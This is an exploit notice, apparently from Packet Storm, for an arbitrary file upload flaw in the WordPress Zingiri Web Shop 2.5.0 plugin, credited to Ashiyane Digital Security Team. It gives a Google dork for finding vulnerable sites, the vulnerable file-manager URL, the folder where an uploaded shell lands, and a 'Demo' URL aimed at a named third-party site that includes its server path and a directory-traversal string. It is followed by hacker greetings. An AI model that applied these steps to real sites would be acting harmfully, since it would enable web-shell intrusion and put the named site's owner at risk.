WordPress Zingiri Web Shop third party plugin version 2.5.0 suffers from a remote shell upload vulnerability. Note that this finding houses site-specific data.
33e48b2629820bb1f49eb5160c1b5e85747875d370c0743db0987af583804bcd((|))((|)) ((|)) |)| (|)| |)
((|)) ***********************
((|)) *********************
* ((|)) * *
*0* ((|)) * In the name of GOD *
* ((|)) * *
-|- ((|)) *******************
| ((|)) *********
((|))((|))((|))################((|))########################((|))
# Exploit Title: Wordpress Zingiri-web-shop 2.5.0 Plugin ((|))
# Arbitrary File Upload Vulnerability ((|))
# Version: 2.5.0 #
# Software Link: www.zingiri.com/plugins-and-addons/web-shop/ #
# Google Dork: inurl:"/wp-content/plugins/zingiri-web-shop/" #
# Exploit Author: Ashiyane Digital Security Team #
# Category: Web Application #
# Tested on: Windows 7 #
###############################((|))#############################
#******************************((|))****************************#
#* Location: http://site.com/wp-content/ #
#* /plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/ #
#* tiny_mce/plugins/ajaxfilemanager/ #
#* ajaxfilemanager.php?path=[path] #
#* Files Upload To: http://site.com/wp-content/plugins/ #
#* fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/#
#* uploaded/file/[Yourshell.X] #
#* Demo: http://vishandelpietkorf.nl/vishandelpietkorf/ #
#* wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/ #
#* jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php#
#* ?path=/home/vhosting/a/vhost0015706/domains/ #
#* vishandelpietkorf.nl/htdocs/www/vishandelpietkorf/wp-content #
#* /plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/ #
#* tiny_mce/plugins/ajaxfilemanager/inc/ #
#* ../../../../../../../../../../uploads/ #
#* zingiri-web-shop/pekelhc/ #
#******************************((|))****************************#
#******************************((|))****************************#
#******************************((|))****************************#
#* ***************** #
#* * * #
#* Greetz to: * My lord ALLAH * #
#* * * #
#* ***************** #
#* **((|))** #
#* Sp Tnx To: Muslims From All Over The World #
#* Behrooz_Ice,Q7X,Ali_Eagle,Azazel,iman_taktaz,sha2ow,,ERroR #
#* 0x21HATE,A.S.P.I.R.I.N,am118,Angel--D3m0n,angola,AR455,Azad™ #
#* Black-Hole,Classic,Encoder,HASSAN20,HidDeEn,hossein19123 #
#* jooooondost,Kaz3m,ll_Invisible_ll,majidflash,megacpu #
#* MehrdadLinux,Milad-Bushehr,MostafaBestMan,MR.SAMAN,Mute,N4H #
#* Pr0grammer,PrinceofHacking,Rizux,Rz04,S!YOU.T4r.6T,Sil3nt Di3#
#* The Smith,unique2world,Unline,V!T0N,X-HIDDEN-X ((|)) #
#* Crypt0,khatarnak,Milad22,MR.Vinci,Pirjo,V1R4N64R * ((|)) * #
#* And All Of My Friends -|- ((|)) -|-#
#* The Last One : My Self, B4b4K KH4TaR /|\ ((|)) /|\#
((|))*********************************************((|))((|))((|))
((|))#############################################((|))((|))((|))
((|)) ((|)) ((|))((|))((|))
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed